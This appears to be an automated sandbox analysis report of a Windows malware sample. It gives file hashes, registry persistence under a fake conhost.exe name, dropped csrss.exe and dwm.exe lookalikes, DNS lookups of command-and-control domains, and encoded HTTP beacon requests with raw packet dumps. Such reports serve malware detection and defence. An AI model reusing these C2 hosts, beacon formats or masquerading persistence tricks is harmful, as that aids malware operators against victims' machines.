Analysis Date2014-06-20 06:51:42
MD5c73494f75c26a4248e542525cdffe904
SHA10b7fecd6c39a649a8870691276b799adf7a8a809

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: fb86dcf9978f82c24227e98ce7dfb347 sha1: c8be16a2d6ad9c86c6f8e3c4ffa501809f97a4fa size: 158208
Section.rdata md5: 2d482025f985b62a674654fec0c1c169 sha1: e24f42389399dd911e5cbdc8cb6b257f6cea99d4 size: 3072
Section.data md5: 750a5c420213b4487dbcc5cc9bf85249 sha1: 1ac5ae4f53254efe3eb9fa34c77d4f83dff8dd5f size: 25088
Section.lib md5: add33a9b81929b5c90b247a9ac12ebd6 sha1: 7667906d513279271544ed3632e80ee61d75235d size: 512
Timestamp2005-10-30 06:22:05
VersionPrivateBuild: 1544
PEhasha343799c0061af7a006ea228976ec19a7106a660
IMPhash547cefa29af10fe0dd766e206f10275c

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdifferentdata-one.com
Winsock DNS127.0.0.1
Winsock DNSrossroadbags.com
Winsock DNSzoneak.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrossroadbags.com
Type: A
50.56.218.189
DNSzonetf.com
Type: A
208.73.211.233
DNSzonetf.com
Type: A
208.73.211.174
DNSzonetf.com
Type: A
208.73.210.219
DNSzonetf.com
Type: A
208.73.211.246
DNSzonetf.com
Type: A
208.73.211.235
DNSdifferentdata-one.com
Type: A
DNSzoneak.com
Type: A
HTTP GEThttp://rossroadbags.com/images/p_thumb/3520.jpg?tq=gP4aKyd9uQ2NgWZOkzBXFdgjhFxVi%2FJ5wkvNl0tACAn5gIsbpgLIHYojdbPb1YHl6grIoP1fAvcaAZgHSdiQEl6E4UEad06ydRIfYgbjSl85oTcZJ0w3iL%2BNa44aAdKqC%2FvZfvITfpvdB8JZ1raFLUeGsPVkIZeVPyH%2BkDk3OEePxdOP9LKDmG%2F3UhA%2Fbxe6tx5XPlWXJ%2BxVi%2BUELco5bqMp71kzjtzhFFtqHdG83fP56nCAGmbtSIqjKUnJGUFS93KC2zdtAuhCjfBJWwMpyoEtnGxIuw7W%2FN4kDvDzM1O5Ev5pjEj0lRAQ8Tr4CH%2B0xPhaWYfVD6%2FlFfRnVoHXTMGTvD9hqi209HqrX3abNGbON3yLVlgYii%2F%2BqdOMNJKfK7%2BguUbNThL9G%2FDeJDXC7YTaUqHAVDi
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 50.56.218.189:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.233:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353230 2e6a7067 3f74713d   umb/3520.jpg?tq=
0x00000020 (00032)   67503461 4b796439 7551324e 67575a4f   gP4aKyd9uQ2NgWZO
0x00000030 (00048)   6b7a4258 4664676a 68467856 69253246   kzBXFdgjhFxVi%2F
0x00000040 (00064)   4a35776b 764e6c30 74414341 6e356749   J5wkvNl0tACAn5gI
0x00000050 (00080)   73627067 4c494859 6f6a6462 50623159   sbpgLIHYojdbPb1Y
0x00000060 (00096)   486c3667 72496f50 31664176 6361415a   Hl6grIoP1fAvcaAZ
0x00000070 (00112)   67485364 6951456c 36453455 45616430   gHSdiQEl6E4UEad0
0x00000080 (00128)   36796452 49665967 626a536c 38356f54   6ydRIfYgbjSl85oT
0x00000090 (00144)   635a4a30 7733694c 2532424e 61343461   cZJ0w3iL%2BNa44a
0x000000a0 (00160)   41644b71 43253246 765a6676 49546670   AdKqC%2FvZfvITfp
0x000000b0 (00176)   76644238 4a5a3172 61464c55 65477350   vdB8JZ1raFLUeGsP
0x000000c0 (00192)   566b495a 65565079 48253242 6b446b33   VkIZeVPyH%2BkDk3
0x000000d0 (00208)   4f456550 78644f50 394c4b44 6d472532   OEePxdOP9LKDmG%2
0x000000e0 (00224)   46335568 41253246 62786536 74783558   F3UhA%2Fbxe6tx5X
0x000000f0 (00240)   506c5758 4a253242 78566925 32425545   PlWXJ%2BxVi%2BUE
0x00000100 (00256)   4c636f35 62714d70 37316b7a 6a747a68   Lco5bqMp71kzjtzh
0x00000110 (00272)   46467471 48644738 33665035 366e4341   FFtqHdG83fP56nCA
0x00000120 (00288)   476d6274 5349716a 4b556e4a 47554653   GmbtSIqjKUnJGUFS
0x00000130 (00304)   39334b43 327a6474 41756843 6a66424a   93KC2zdtAuhCjfBJ
0x00000140 (00320)   57774d70 796f4574 6e477849 75773757   WwMpyoEtnGxIuw7W
0x00000150 (00336)   2532464e 346b4476 447a4d31 4f354576   %2FN4kDvDzM1O5Ev
0x00000160 (00352)   35706a45 6a306c52 41513854 72344348   5pjEj0lRAQ8Tr4CH
0x00000170 (00368)   25324230 78506861 57596656 44362532   %2B0xPhaWYfVD6%2
0x00000180 (00384)   466c4666 526e566f 4858544d 47547644   FlFfRnVoHXTMGTvD
0x00000190 (00400)   39687169 32303948 71725833 61624e47   9hqi209HqrX3abNG
0x000001a0 (00416)   624f4e33 794c566c 67596969 25324625   bON3yLVlgYii%2F%
0x000001b0 (00432)   32427164 4f4d4e4a 4b664b37 25324267   2BqdOMNJKfK7%2Bg
0x000001c0 (00448)   7555624e 54684c39 47253246 44654a44   uUbNThL9G%2FDeJD
0x000001d0 (00464)   58433759 54615571 48415644 69204854   XC7YTaUqHAVDi HT
0x000001e0 (00480)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x000001f0 (00496)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000200 (00512)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000210 (00528)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000220 (00544)   55736572 2d416765 6e743a20 6f706572   User-Agent: oper
0x00000230 (00560)   612f382e 31310d0a 0d0a                a/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a773757   on: close....w7W
0x00000150 (00336)   2532464e 346b4476 447a4d31 4f354576   %2FN4kDvDzM1O5Ev
0x00000160 (00352)   35706a45 6a306c52 41513854 72344348   5pjEj0lRAQ8Tr4CH
0x00000170 (00368)   25324230 78506861 57596656 44362532   %2B0xPhaWYfVD6%2
0x00000180 (00384)   466c4666 526e566f 4858544d 47547644   FlFfRnVoHXTMGTvD
0x00000190 (00400)   39687169 32303948 71725833 61624e47   9hqi209HqrX3abNG
0x000001a0 (00416)   624f4e33 794c566c 67596969 25324625   bON3yLVlgYii%2F%
0x000001b0 (00432)   32427164 4f4d4e4a 4b664b37 25324267   2BqdOMNJKfK7%2Bg
0x000001c0 (00448)   7555624e 54684c39 47253246 44654a44   uUbNThL9G%2FDeJD
0x000001d0 (00464)   58433759 54615571 48415644 69204854   XC7YTaUqHAVDi HT
0x000001e0 (00480)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x000001f0 (00496)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000200 (00512)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000210 (00528)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000220 (00544)   55736572 2d416765 6e743a20 6f706572   User-Agent: oper
0x00000230 (00560)   612f382e 31310d0a 0d0a                a/8.11....


Strings
.
I
.

040904b0
1544
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
'/,@1F
3fvuky
+3RnF3
]	_]4@
4]yn~"
6X0r!d
8[}|/HhX1
8M^"64 
A$&cV=zFsMP+!
]a>m!R.}
AnimatePalette
+b0JD_4
bg%Gjwd+Xi
ByOncI
[:$%c~
CallNextHookEx
ChildWindowFromPoint
ClipCursor
CLSIDFromProgID
CLSIDFromString
CoCreateGuid
CoCreateInstance
CoFreeUnusedLibraries
CoGetClassObject
CoGetMalloc
COMCTL32.dll
comdlg32.dll
CompareStringW
CoTaskMemAlloc
CoTaskMemFree
CreateFiberEx
CreateFontIndirectA
CreateILockBytesOnHGlobal
CreatePen
CreateStreamOnHGlobal
Da~2F]
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
EmptyClipboard
EnumResourceNamesW
EX	pUXB
ExtCreatePen
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlattenPath
FlushFileBuffers
fQ5=_c
$FWr?m8J
GDI32.dll
GetBitmapBits
GetBkColor
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetHGlobalFromILockBytes
GetHGlobalFromStream
GetPath
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
H*V	/}
\,h=Y]
)I;}6Z+
@Id$sBe
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
I,qI=b
IsClipboardFormatAvailable
IsDBCSLeadByte
ItMGQS
iwVu*z
_+:=J]
JgnW	{
.{ ji>zHo
JLM6_A
JRichu
Jr;YrqDV
.\k0HJ
KERNEL32.dll
kLH?~.a
*kn))/
KOIEj.]Cy
ku8)lj
L7u+(T
LocalAlloc
LockFile
lV=dymQ
M,k^5'
ml [K^~
MonitorFromWindow
NdrClientCall
**(O|\
{o#@5,K
O`;~L?43!
ole32.dll
OleDuplicateData
OleGetAutoConvert
OleRegGetUserType
OleRun
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
P"#=c*
PlgBlt
P	,Mkj!
PolyBezier
ProgIDFromCLSID
*qsIbi-
`.rdata
RegisterClassW
RegisterDragDrop
ReleaseStgMedium
RevokeDragDrop
*RJ7rRU
RoundRect
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetCommConfig
SetDIBits
SetEndOfFile
SetScrollRange
SetStretchBltMode
SetTextColor
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
StgCreateDocfileOnILockBytes
StgOpenStorageOnILockBytes
StringFromCLSID
StrokePath
T7\V9jK
TH+?]~
!This program cannot be run in DOS mode.
T&>MPx
ToAscii
?U>h8C
UnhookWindowsHookEx
UnlockFile
UO<L{hvq
USER32.dll
UV/|t;
u	W966
VerLanguageNameW
}wd;*ko!
WinHelpW
xC`S|)
XI/_Wc
x=kmL_
,ZWTkH